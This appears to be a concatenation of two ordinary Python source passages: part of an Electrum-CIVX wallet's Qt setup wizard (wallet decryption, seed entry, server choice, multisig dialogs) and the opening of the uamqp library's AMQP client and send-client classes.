if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
return
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
action = self.storage.get_action()
if action and action not in ('new', 'upgrade_storage'):
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('With it, you can recover your tokens if you lose your wallet.'),
_('Without it, your tokens will be lost forever.'),
_('To make sure that you have properly saved your seed, please enter it here to validate.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum-CIVX communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum-CIVX "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
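# A minimal, Qt-free sketch of the constraint the two sliders above enforce
# (1 <= m <= n and 2 <= n <= 15). clamp_multisig_choice is a hypothetical helper
# for illustration only; it is not used by the wizard itself.
def clamp_multisig_choice(m, n, n_max=15):
    """Clamp an m-of-n multisig selection the way multisig_dialog's sliders do."""
    n = max(2, min(n, n_max))   # cosigner count is kept between 2 and n_max
    m = max(1, min(m, n))       # required signatures never exceed the cosigner count
    return m, n
# e.g. clamp_multisig_choice(5, 3) == (3, 3); clamp_multisig_choice(2, 3) == (2, 3)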
|
client.py
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=too-many-lines
import logging
import threading
import time
import uuid
from uamqp import (Connection, Session, address, authentication, c_uamqp,
compat, constants, errors, receiver, sender)
from uamqp.constants import TransportType
_logger = logging.getLogger(__name__)
class AMQPClient(object):
"""An AMQP client.
:param remote_address: The AMQP endpoint to connect to. This could be a send target
or a receive source.
:type remote_address: str, bytes or ~uamqp.address.Address
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, remote_address, auth=None, client_name=None, debug=False,
error_policy=None, keep_alive_interval=None, **kwargs):
self._encoding = kwargs.pop('encoding', None) or 'UTF-8'
self._transport_type = kwargs.pop('transport_type', None) or TransportType.Amqp
self._http_proxy = kwargs.pop('http_proxy', None)
self._remote_address = remote_address if isinstance(remote_address, address.Address) \
else address.Address(remote_address)
self._hostname = self._remote_address.hostname
if not auth:
username = self._remote_address.username
password = self._remote_address.password
if username and password:
username = compat.unquote_plus(username)
password = compat.unquote_plus(password)
auth = authentication.SASLPlain(
self._hostname, username, password,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._auth = auth if auth else authentication.SASLAnonymous(
self._hostname,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._name = client_name if client_name else str(uuid.uuid4())
self._debug_trace = debug
self._counter = c_uamqp.TickCounter()
self._shutdown = False
self._connection = None
self._ext_connection = False
self._session = None
self._backoff = 0
self._error_policy = error_policy or errors.ErrorPolicy()
self._keep_alive_interval = int(keep_alive_interval) if keep_alive_interval else 0
self._keep_alive_thread = None
# Connection settings
self._max_frame_size = kwargs.pop('max_frame_size', None) or constants.MAX_FRAME_SIZE_BYTES
self._channel_max = kwargs.pop('channel_max', None)
self._idle_timeout = kwargs.pop('idle_timeout', None)
self._properties = kwargs.pop('properties', None)
self._remote_idle_timeout_empty_frame_send_ratio = kwargs.pop(
'remote_idle_timeout_empty_frame_send_ratio', None)
# Session settings
self._outgoing_window = kwargs.pop('outgoing_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._incoming_window = kwargs.pop('incoming_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._handle_max = kwargs.pop('handle_max', None)
self._on_attach = kwargs.pop('on_attach', None)
# Link settings
self._send_settle_mode = kwargs.pop('send_settle_mode', None) or constants.SenderSettleMode.Unsettled
self._receive_settle_mode = kwargs.pop('receive_settle_mode', None) or constants.ReceiverSettleMode.PeekLock
self._desired_capabilities = kwargs.pop('desired_capabilities', None)
# AMQP object settings
self.message_handler = None
self.connection_type = Connection
self.session_type = Session
if kwargs:
raise ValueError("Received unrecognized kwargs: {}".format(", ".join(kwargs.keys())))
def __enter__(self):
"""Run Client in a context manager."""
self.open()
return self
def __exit__(self, *args):
"""Close and destroy Client on exiting a context manager."""
self.close()
def _keep_alive(self):
start_time = self._counter.get_current_ms()
try:
while self._connection and not self._shutdown:
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - start_time)/1000
if elapsed_time >= self._keep_alive_interval:
_logger.debug("Keeping %r connection alive.", self.__class__.__name__)
self._connection.work()
start_time = current_time
time.sleep(1)
except Exception as e: # pylint: disable=broad-except
_logger.info("Connection keep-alive for %r failed: %r.", self.__class__.__name__, e)
def _client_ready(self): # pylint: disable=no-self-use
"""Determine whether the client is ready to start sending and/or
receiving messages. To be ready, the connection must be open and
authentication complete.
:rtype: bool
"""
return True
def _client_run(self):
"""Perform a single Connection iteration."""
self._connection.work()
def _redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if not self._connection._cbs: # pylint: disable=protected-access
_logger.debug("Closing non-CBS session.")
self._session.destroy()
self._session = None
self._auth = auth
self._hostname = self._remote_address.hostname
self._connection.redirect(redirect, auth)
self._build_session()
def _build_session(self):
"""Build self._session based on current self.connection.
"""
# pylint: disable=protected-access
if not self._connection._cbs and isinstance(self._auth, authentication.CBSAuthMixin):
self._connection._cbs = self._auth.create_authenticator(
self._connection,
debug=self._debug_trace,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
self._session = self._auth._session # pylint: disable=protected-access
elif self._connection._cbs:
self._session = self._auth._session # pylint: disable=protected-access
else:
self._session = self.session_type(
self._connection,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
def open(self, connection=None):
"""Open the client. The client can create a new Connection
or an existing Connection can be passed in. This existing Connection
may have an existing CBS authentication Session, which will be
used for this client as well. Otherwise a new Session will be
created.
:param connection: An existing Connection that may be shared between
multiple clients.
:type connection: ~uamqp.connection.Connection
"""
# pylint: disable=protected-access
if self._session:
return # already open.
_logger.debug("Opening client connection.")
try:
if connection:
_logger.debug("Using existing connection.")
self._auth = connection.auth
self._ext_connection = True
connection.lock()
self._connection = connection or self.connection_type(
self._hostname,
self._auth,
container_id=self._name,
max_frame_size=self._max_frame_size,
channel_max=self._channel_max,
idle_timeout=self._idle_timeout,
properties=self._properties,
remote_idle_timeout_empty_frame_send_ratio=self._remote_idle_timeout_empty_frame_send_ratio,
error_policy=self._error_policy,
debug=self._debug_trace,
encoding=self._encoding)
self._build_session()
if self._keep_alive_interval:
self._keep_alive_thread = threading.Thread(target=self._keep_alive)
self._keep_alive_thread.start()
finally:
if self._ext_connection:
connection.release()
def close(self):
"""Close the client. This includes closing the Session
and CBS authentication layer as well as the Connection.
If the client was opened using an external Connection,
this will be left intact.
No further messages can be sent or received and the client
cannot be re-opened.
All pending, unsent messages will remain uncleared to allow
them to be inspected and queued to a new client.
"""
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = True
if self._keep_alive_thread:
self._keep_alive_thread.join()
self._keep_alive_thread = None
if not self._session:
return # already closed.
if not self._connection._cbs: # pylint: disable=protected-access
_logger.debug("Closing non-CBS session.")
self._session.destroy()
else:
_logger.debug("CBS session pending.")
self._session = None
if not self._ext_connection:
_logger.debug("Closing exclusive connection.")
self._connection.destroy()
else:
_logger.debug("Shared connection remaining open.")
self._connection = None
def mgmt_request(self, message, operation, op_type=None, node=None, callback=None, **kwargs):
"""Run a request/response operation. These are frequently used for management
tasks against a $management node; however, any node name can be specified,
and the available options will depend on the target service.
:param message: The message to send in the management request.
:type message: ~uamqp.message.Message
:param operation: The type of operation to be performed. This value will
be service-specific, but common values include READ, CREATE and UPDATE.
This value will be added as an application property on the message.
:type operation: bytes
:param op_type: The type on which to carry out the operation. This will
be specific to the entities of the service. This value will be added as
an application property on the message.
:type op_type: bytes
:param node: The target node. Default is `b"$management"`.
:type node: bytes
:param timeout: Provide an optional timeout in milliseconds within which a response
to the management request must be received.
:type timeout: float
:param callback: The function to process the returned parameters of the management
request including status code and a description if available. This can be used
to reformat the response or raise an error based on content. The function must
take 3 arguments - status code, response message and description.
:type callback: ~callable[int, bytes, ~uamqp.message.Message]
:param status_code_field: Provide an alternate name for the status code in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusCode"`.
:type status_code_field: bytes
:param description_fields: Provide an alternate name for the description in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusDescription"`.
:type description_fields: bytes
:rtype: ~uamqp.message.Message
"""
while not self.auth_complete():
time.sleep(0.05)
response = self._session.mgmt_request(
message,
operation,
op_type=op_type,
node=node,
callback=callback,
encoding=self._encoding,
debug=self._debug_trace,
**kwargs)
return response
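    # Hedged example of a request/response call; the operation, op_type and the
    # 'name' application property are placeholders for a service-specific contract.
    #
    #     from uamqp.message import Message
    #     response = client.mgmt_request(
    #         Message(application_properties={'name': 'my-entity'}),
    #         operation=b'READ',
    #         op_type=b'com.example:entity',
    #         node=b'$management')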
def auth_complete(self):
"""Whether the authentication handshake is complete during
connection initialization.
:rtype: bool
"""
timeout = False
auth_in_progress = False
if self._connection._cbs: # pylint: disable=protected-access
timeout, auth_in_progress = self._auth.handle_token()
if timeout is None and auth_in_progress is None:
_logger.debug("No work done.")
return False
if timeout:
raise compat.TimeoutException("Authorization timeout.")
if auth_in_progress:
self._connection.work()
return False
return True
def client_ready(self):
"""
Whether the handler has completed all start up processes such as
establishing the connection, session, link and authentication, and
is now ready to process messages.
:rtype: bool
"""
if not self.auth_complete():
return False
if not self._client_ready():
self._connection.work()
return False
return True
def do_work(self):
"""Run a single connection iteration.
This will return `True` if the connection is still open
and ready to be used for further work, or `False` if it needs
to be shut down.
:rtype: bool
:raises: TimeoutError or ~uamqp.errors.ClientTimeout if CBS authentication timeout reached.
"""
if self._shutdown:
return False
if not self.client_ready():
return True
return self._client_run()
class SendClient(AMQPClient):
"""An AMQP client for sending messages.
:param target: The target AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Target object.
:type target: str, bytes or ~uamqp.address.Target
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param msg_timeout: A timeout in milliseconds for messages from when they have been
added to the send queue to when the message is actually sent. This prevents potentially
expired data from being sent. If set to 0, messages will not expire. Default is 0.
:type msg_timeout: int
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param link_credit: The sender Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
:type link_credit: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, target, auth=None, client_name=None, debug=False, msg_timeout=0,
error_policy=None, keep_alive_interval=None, **kwargs):
target = target if isinstance(target, address.Address) else address.Target(target)
self._msg_timeout = msg_timeout
self._pending_messages = []
self._waiting_messages = []
self._shutdown = None
# Sender and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._link_properties = kwargs.pop('link_properties', None)
self._link_credit = kwargs.pop('link_credit', None)
# AMQP object settings
self.sender_type = sender.MessageSender
super(SendClient, self).__init__(
target,
auth=auth,
client_name=client_name,
debug=debug,
error_policy=error_policy,
keep_alive_interval=keep_alive_interval,
**kwargs)
def _client_ready(self):
"""Determine whether the client is ready to start sending messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageSender must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageSender
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.sender_type(
self._session, self._name, self._remote_address,
name='sender-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
send_settle_mode=self._send_settle_mode,
receive_settle_mode=self._receive_settle_mode,
max_message_size=self._max_message_size,
link_credit=self._link_credit,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageSenderState.Error:
raise errors.MessageHandlerError(
"Message Sender Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageSenderState.Open:
return False
return True
def _on_message_sent(self, message, result, delivery_state=None):
"""Callback run on a message send operation. If message
has a user defined callback, it will be called here. If the result
of the operation is failure, the message state will be reverted
to 'pending' up to the maximum retry count.
:param message: The message that was sent.
:type message: ~uamqp.message.Message
:param result: The result of the send operation.
:type result: int
:param delivery_state: The returned delivery state, or an Exception if an error
 occurred during the send operation.
:type delivery_state: ~Exception
"""
# pylint: disable=protected-access
try:
exception = delivery_state
result = constants.MessageSendResult(result)
if result == constants.MessageSendResult.Error:
if isinstance(delivery_state, Exception):
exception = errors.ClientMessageError(delivery_state, info=delivery_state)
exception.action = errors.ErrorAction(retry=True)
elif delivery_state:
error = errors.ErrorResponse(delivery_state)
exception = errors._process_send_error(
self._error_policy,
error.condition,
error.description,
error.info)
else:
exception = errors.MessageSendFailed(constants.ErrorCodes.UnknownError)
exception.action = errors.ErrorAction(retry=True)
if exception.action.retry == errors.ErrorAction.retry \
and message.retries < self._error_policy.max_retries:
if exception.action.increment_retries:
message.retries += 1
self._backoff = exception.action.backoff
_logger.debug("Message error, retrying. Attempts: %r, Error: %r", message.retries, exception)
message.state = constants.MessageState.WaitingToBeSent
return
if exception.action.retry == errors.ErrorAction.retry:
_logger.info("Message error, %r retries exhausted. Error: %r", message.retries, exception)
else:
_logger.info("Message error, not retrying. Error: %r", exception)
message.state = constants.MessageState.SendFailed
message._response = exception
else:
_logger.debug("Message sent: %r, %r", result, exception)
message.state = constants.MessageState.SendComplete
message._response = errors.MessageAlreadySettled()
if message.on_send_complete:
message.on_send_complete(result, exception)
except KeyboardInterrupt:
_logger.error("Received shutdown signal while processing message send completion.")
self.message_handler._error = errors.AMQPClientShutdown()
def _get_msg_timeout(self, message):
current_time = self._counter.get_current_ms()
